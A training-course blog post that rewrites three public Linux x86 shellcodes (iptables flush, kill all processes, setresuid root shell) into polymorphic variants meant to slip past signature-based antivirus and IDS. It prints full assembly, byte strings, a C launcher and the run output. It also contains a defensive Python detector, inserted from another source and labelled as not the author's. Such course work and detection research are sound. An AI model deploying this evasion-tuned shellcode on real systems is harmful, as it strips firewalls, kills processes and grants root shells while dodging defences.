SLAE 0x6 – Polymorphic Shellcode

Anti-virus and IDS vendors constantly create signatures for any new type of shellcode to keep their products updated and protect against attacks. But malware developers also try to remain ahead of the game by finding new ways to evade AV/IDS.
Today we will cover creating polymorphic shellcode, which is often used to defeat signature-based AV/IDS.

Note that this method will not protect against heuristic-based AV/IDS.

Polymorphic Shellcodes
Polymorphic shellcode is built by finding equivalent instructions that produce the same result. We do this by replacing the existing assembly instructions with different assembly instructions that still logically perform the same operation. As a result, signature-based AV/IDS fails to identify the malicious code/traffic.

Let's take 3 different shellcodes from shell-storm.org and create polymorphic versions of them.

Linux/x86 iptables -F

Below is our polymorphic shellcode. We have used simple techniques such as replacing xor eax, eax with sub eax, eax. Next, instead of pushing the string ///sbin/iptables, we move the bytes of the string onto the stack at esp-4, esp-8 and esp-12 and then adjust esp accordingly. Notice that we have also split 0x61747069 into 0x51636058 and 0x10111011, which are added back together in edi. Also, instead of ///sbin/iptables we move //sbin//iptables onto the stack.

; Original Shellcode - 43 bytes: http://shell-storm.org/shellcode/files/shellcode-825.php
; Polymorphic Shellcode - 62 bytes
; Author: buffered4ever
; 15-03-2019
global _start
section .text
_start:

sub eax,eax ; changed from xor eax, eax
push eax
push word 0x462d
mov esi, esp
push eax
push 0x73656c62
mov edi, 0x51636058
add edi, 0x10111011 ; changed from push 0x61747069
mov dword[esp-4], edi
mov dword[esp-8], 0x2f2f6e69 ; changed from push 0x2f6e6962
mov dword[esp-12], 0x62732f2f ; changed from push 0x732f2f2f
sub esp, 12 ; adjusting the stack
mov ebx, esp
push eax
push esi
push ebx
mov ecx, esp
mov edx, eax
mov al, 0xb
int 0x80

Let's compile and link the assembly code:
ddpinto@slae:~$ ./compile.sh poly1
[+] Assembling with NASM …
[+] Linking …
[+] Done! …
Now let's use some cmdfu to generate the shellcode:

ddpinto@slae:~$ objdump -d ./poly1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x29\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73\xbf\x58\x60\x63\x51\x81\xc7\x11\x10\x11\x10\x89\x7c\x24\xfc\xc7\x44\x24\xf8\x69\x6e\x2f\x2f\xc7\x44\x24\xf4\x2f\x2f\x73\x62\x83\xec\x0c\x89\xe3\x50\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

Now let's include the shellcode in our C wrapper:

// Linux/x86 iptables -F
// Original Shellcode - 43 bytes: http://shell-storm.org/shellcode/files/shellcode-825.php
// Polymorphic Shellcode - 62 bytes
// Author: buffered4ever
// 15-03-2019
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x29\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73\xbf\x58\x60\x63\x51\x81\xc7\x11\x10\x11\x10\x89\x7c\x24\xfc\xc7\x44\x24\xf8\x69\x6e\x2f\x2f\xc7\x44\x24\xf4\x2f\x2f\x73\x62\x83\xec\x0c\x89\xe3\x50\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
int main()
{
printf("Shellcode Length: %zu\n", strlen(code));
int (*ret)() = (int(*)())code; /* treat the byte array as code; needs an executable stack */
ret();
return 0;
}

Let's compile the C code:
ddpinto@slae:~$ gcc -fno-stack-protector -z execstack shellcode_poly1.c -o shellcode_poly1

Before we run the shellcode, let's check the iptables rules:

ddpinto@slae:~$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:http
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination

We have a rule that allows HTTP from any source to any destination.
Now let's run the shellcode and check the iptables rules again:

ddpinto@slae:~$ sudo ./shellcode_poly1
Shellcode Length: 62
ddpinto@slae:~$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Our polymorphic shellcode works and the iptables rules have been flushed.
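As an added example (not from the post or its author), the following Python script shows why the substitutions above defeat a byte-level signature but not a check on what the code does: a constructed signature for the original prologue matches the original bytes and misses the polymorphic ones, while a small heuristic scanner that recovers the stack-built string (summing the mov edi/add edi split) and spots the execve syscall flags both. The 43-byte original is reconstructed here from the post's "changed from" comments, which is an assumption.

```python
import re

# Bytes of the 62-byte polymorphic "iptables -F" shellcode printed in the post.
POLY = (b"\x29\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73\xbf\x58\x60\x63\x51"
        b"\x81\xc7\x11\x10\x11\x10\x89\x7c\x24\xfc\xc7\x44\x24\xf8\x69\x6e\x2f\x2f\xc7\x44"
        b"\x24\xf4\x2f\x2f\x73\x62\x83\xec\x0c\x89\xe3\x50\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80")
# The 43-byte original, reconstructed here from the post's "changed from" comments (an
# assumption, not copied from shell-storm): xor eax,eax and four push imm32 string stores.
ORIG = (b"\x31\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73\x68\x69\x70\x74\x61"
        b"\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x73\x89\xe3\x50\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80")

# Constructed byte signature in the style of a naive AV/IDS rule: the original prologue
# (xor eax,eax / push eax / push word "-F") followed by the push-immediate "bles" "ipta" pair.
ORIG_SIG = re.compile(rb"\x31\xc0\x50\x66\x68\x2d\x46.*?\x68bles\x68ipta", re.S)

def naive_signature_hits(blob):
    return ORIG_SIG.search(blob) is not None

def stack_chunks(blob):
    """Heuristic scan (not a disassembler) for the string-store forms used in the post:
    push imm32, push word imm16, mov dword [esp+disp8], imm32, and mov edi/add edi pairs."""
    chunks, pending_edi, i = [], None, 0
    while i < len(blob):
        if blob[i] == 0x68:                             # push imm32
            chunks.append(blob[i + 1:i + 5]); i += 5
        elif blob[i:i + 2] == b"\x66\x68":              # push word imm16
            chunks.append(blob[i + 2:i + 4]); i += 4
        elif blob[i:i + 3] == b"\xc7\x44\x24":          # mov dword [esp+disp8], imm32
            chunks.append(blob[i + 4:i + 8]); i += 8
        elif blob[i] == 0xbf:                           # mov edi, imm32
            pending_edi = int.from_bytes(blob[i + 1:i + 5], "little"); i += 5
        elif blob[i:i + 2] == b"\x81\xc7" and pending_edi is not None:  # add edi, imm32
            total = (pending_edi + int.from_bytes(blob[i + 2:i + 6], "little")) & 0xffffffff
            chunks.append(total.to_bytes(4, "little")); pending_edi = None; i += 6
        else:
            i += 1                                      # anything else: keep scanning
    return chunks

def recovered_string(blob):
    """Stack strings are stored last chunk first, so reverse the chunk order, then collapse
    repeated slashes so that ///sbin/ and //sbin// compare equal."""
    text = b"".join(reversed(stack_chunks(blob))).decode("latin-1")
    return re.sub(r"/+", "/", text)

def behaviour_hits(blob):
    """Flag an execve syscall (mov al, 0xb ; int 0x80) together with an iptables flush."""
    s = recovered_string(blob)
    return b"\xb0\x0b\xcd\x80" in blob and "/sbin/iptables" in s and "-F" in s
```

Running `naive_signature_hits` and `behaviour_hits` over both blobs shows the signature catching only the original while the behavioural check catches both.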

Kill all processes for Linux/x86

Our second shellcode has a very subtle difference. Instead of pushing and popping 9 into ecx, we directly move the byte 9 into cl. This reduces the size by 1 byte: the original shellcode was 11 bytes, ours is 10 bytes.

; linux/x86 kill all processes
; Original Shellcode - 11 bytes: http://shell-storm.org/shellcode/files/shellcode-212.php
; Polymorphic Shellcode - 10 bytes
; Author: buffered4ever
; 15-03-2019
global _start
section .text

_start:
; kill(-1, SIGKILL);

push byte 37
pop eax ; #define __NR_kill 37
push byte -1
pop ebx;
mov cl, 9 ; changed from push byte 9 / pop ecx; only sets the low byte, so it relies on the upper 24 bits of ecx already being zero (true at process entry, not guaranteed inside a wrapper)
int 0x80

linux x86 setresuid(0,0,0)-/bin/sh

For the third shellcode we have again made simple changes such as substituting sub eax, eax for xor eax, eax. We have removed cdq and substituted and edx, eax, which clears the edx register. The comments in the code below explain the changes from the original shellcode.

; linux x86 setresuid(0,0,0)-/bin/sh
; Original Shellcode - 35 bytes: http://shell-storm.org/shellcode/files/shellcode-220.php
; Polymorphic Shellcode - 41 bytes
; Author: buffered4ever
; 15-03-2019

global _start

section .text
_start:

;setresuid(0,0,0)
sub eax, eax ; changed from xor eax, eax
mov ebx, eax ; changed from xor ebx, ebx
and ecx, ebx ; changed from xor ecx, ecx (ebx is already zero, so this clears ecx; xor ecx, ebx would leave ecx unchanged)
and edx, eax ; changed from cdq
add al, 0xa5 ; changed from mov al, 0xa4
sub al, 1
int 0x80

; execve("//bin/sh", ["//bin/sh", NULL], [NULL])
xor eax, eax
mov al, 10
add al, 1 ; changed from push byte 11 / pop eax
push ecx
push 0x68732f6e ; changed from push 0x68732f2f
push 0x69622f2f ; changed from push 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 0x80

Github: https://github.com/buffered4ever/SLAE – 0x6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: PA-1932
